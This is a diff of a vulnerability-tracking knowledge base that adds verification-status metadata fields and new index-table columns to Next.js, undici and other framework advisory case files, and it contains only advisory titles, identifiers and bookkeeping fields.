查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-10T01:28:46.973023Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-9g9p
# Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration # Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-59471` - Canonical ID: `nextjs--CVE-2025-59471`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59472.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-06T13:13:43.709252Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-5f7q
# Next.js has Unbounded Memory Consumption via PPR Resume Endpoint # Next.js has Unbounded Memory Consumption via PPR Resume Endpoint
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-59472` - Canonical ID: `nextjs--CVE-2025-59472`

13
07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-5j59-xgg2-r9c4.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:46:38.768104Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -48,6 +52,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-5j59
# Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up # Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--GHSA-5j59-xgg2-r9c4` - Canonical ID: `nextjs--GHSA-5j59-xgg2-r9c4`

13
07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-9qr9-h5gf-34mp.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:45:15.823345Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -43,6 +47,15 @@ primary_source: "https://github.com/facebook/react/security/advisories/GHSA-fv66
# Next.js is vulnerable to RCE in React flight protocol # Next.js is vulnerable to RCE in React flight protocol
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--GHSA-9qr9-h5gf-34mp` - Canonical ID: `nextjs--GHSA-9qr9-h5gf-34mp`

13
07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-h25m-26qc-wcjf.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-13T00:43:52.836085Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -48,6 +52,15 @@ primary_source: "https://github.com/facebook/react/security/advisories/GHSA-83fc
# Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components # Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--GHSA-h25m-26qc-wcjf` - Canonical ID: `nextjs--GHSA-h25m-26qc-wcjf`

13
07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-mwv6-3258-q52c.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:55:54.855562Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -49,6 +53,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-mwv6
# Next Vulnerable to Denial of Service with Server Components # Next Vulnerable to Denial of Service with Server Components
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--GHSA-mwv6-3258-q52c` - Canonical ID: `nextjs--GHSA-mwv6-3258-q52c`

13
07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-w37m-7fhw-fmv9.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:51:40.627151Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -47,6 +51,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-w37m
# Next Server Actions Source Code Exposure # Next Server Actions Source Code Exposure
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--GHSA-w37m-7fhw-fmv9` - Canonical ID: `nextjs--GHSA-w37m-7fhw-fmv9`

12
07-framework-security/frameworks/nodejs/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/nuxt/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -26,6 +30,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/rails/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/react/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -26,6 +30,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/spring-boot/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/spring-framework/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/spring-security/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/sveltekit/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/symfony/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

38
07-framework-security/frameworks/undici/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `14` - 总案例数: `14`
- 近 30 天新增/更新: `7` - 近 30 天新增/更新: `7`
- 重点 Markdown 案例数: `14` - 重点 Markdown 案例数: `14`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `14`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,19 +29,19 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression | `low` | `generated` | `official` | `2026-03-13T20:54:25.563997Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1526.md) | | Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T20:54:25.563997Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1526.md) |
| Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation | `low` | `generated` | `official` | `2026-03-13T20:54:26.149214Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-2229.md) | | Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T20:54:26.149214Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-2229.md) |
| Undici has CRLF Injection in undici via `upgrade` option | `low` | `generated` | `official` | `2026-03-13T20:54:25.572106Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1527.md) | | Undici has CRLF Injection in undici via `upgrade` option | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T20:54:25.572106Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1527.md) |
| Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS | `low` | `generated` | `official` | `2026-03-13T20:54:25.417862Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-2581.md) | | Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T20:54:25.417862Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-2581.md) |
| Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client | `low` | `generated` | `official` | `2026-03-14T09:17:45.838435Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1528.md) | | Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-14T09:17:45.838435Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1528.md) |
| Undici has an HTTP Request/Response Smuggling issue | `low` | `generated` | `official` | `2026-03-14T09:19:54.772219Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1525.md) | | Undici has an HTTP Request/Response Smuggling issue | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-14T09:19:54.772219Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1525.md) |
| Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion | `low` | `generated` | `official` | `2026-02-04T02:56:17.456091Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-22036.md) | | Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:56:17.456091Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-22036.md) |
| undici Denial of Service attack via bad certificate data | `low` | `generated` | `official` | `2026-02-06T22:08:08.311705Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2025-47279.md) | | undici Denial of Service attack via bad certificate data | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-06T22:08:08.311705Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2025-47279.md) |
| Use of Insufficiently Random Values in undici | `low` | `generated` | `official` | `2026-02-04T02:29:26.373390Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2025-22150.md) | | Use of Insufficiently Random Values in undici | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:29:26.373390Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2025-22150.md) |
| Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect | `low` | `generated` | `official` | `2025-11-04T19:44:42Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2024-30261.md) | | Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-11-04T19:44:42Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2024-30261.md) |
| Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline | `low` | `generated` | `official` | `2025-11-04T19:44:28Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2024-30260.md) | | Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-11-04T19:44:28Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2024-30260.md) |
| Undici's cookie header not cleared on cross-origin redirect in fetch | `low` | `generated` | `official` | `2026-02-04T02:35:56.289390Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2023-45143.md) | | Undici's cookie header not cleared on cross-origin redirect in fetch | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:35:56.289390Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2023-45143.md) |
| undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect | `low` | `generated` | `official` | `2026-02-04T03:02:08.652391Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2022-31151.md) | | undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:02:08.652391Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2022-31151.md) |
| ProxyAgent vulnerable to MITM | `low` | `generated` | `official` | `2026-03-13T22:15:23.541247Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2022-32210.md) | | ProxyAgent vulnerable to MITM | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:15:23.541247Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2022-32210.md) |

13
07-framework-security/frameworks/undici/cases/undici-cve-2022-31151.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:02:08.652391Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-q768-
# undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect # undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2022-31151` - Canonical ID: `undici--CVE-2022-31151`

13
07-framework-security/frameworks/undici/cases/undici-cve-2022-32210.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:15:23.541247Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -30,6 +34,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-pgw7-
# ProxyAgent vulnerable to MITM # ProxyAgent vulnerable to MITM
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2022-32210` - Canonical ID: `undici--CVE-2022-32210`

13
07-framework-security/frameworks/undici/cases/undici-cve-2023-45143.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:35:56.289390Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-q768-
# Undici's cookie header not cleared on cross-origin redirect in fetch # Undici's cookie header not cleared on cross-origin redirect in fetch
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2023-45143` - Canonical ID: `undici--CVE-2023-45143`

13
07-framework-security/frameworks/undici/cases/undici-cve-2024-30260.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2025-11-04T19:44:28Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-m4v8-
# Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline # Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2024-30260` - Canonical ID: `undici--CVE-2024-30260`

13
07-framework-security/frameworks/undici/cases/undici-cve-2024-30261.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2025-11-04T19:44:42Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-9qxr-
# Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect # Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2024-30261` - Canonical ID: `undici--CVE-2024-30261`

13
07-framework-security/frameworks/undici/cases/undici-cve-2025-22150.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:29:26.373390Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -34,6 +38,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-c76h-
# Use of Insufficiently Random Values in undici # Use of Insufficiently Random Values in undici
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2025-22150` - Canonical ID: `undici--CVE-2025-22150`

13
07-framework-security/frameworks/undici/cases/undici-cve-2025-47279.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-06T22:08:08.311705Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
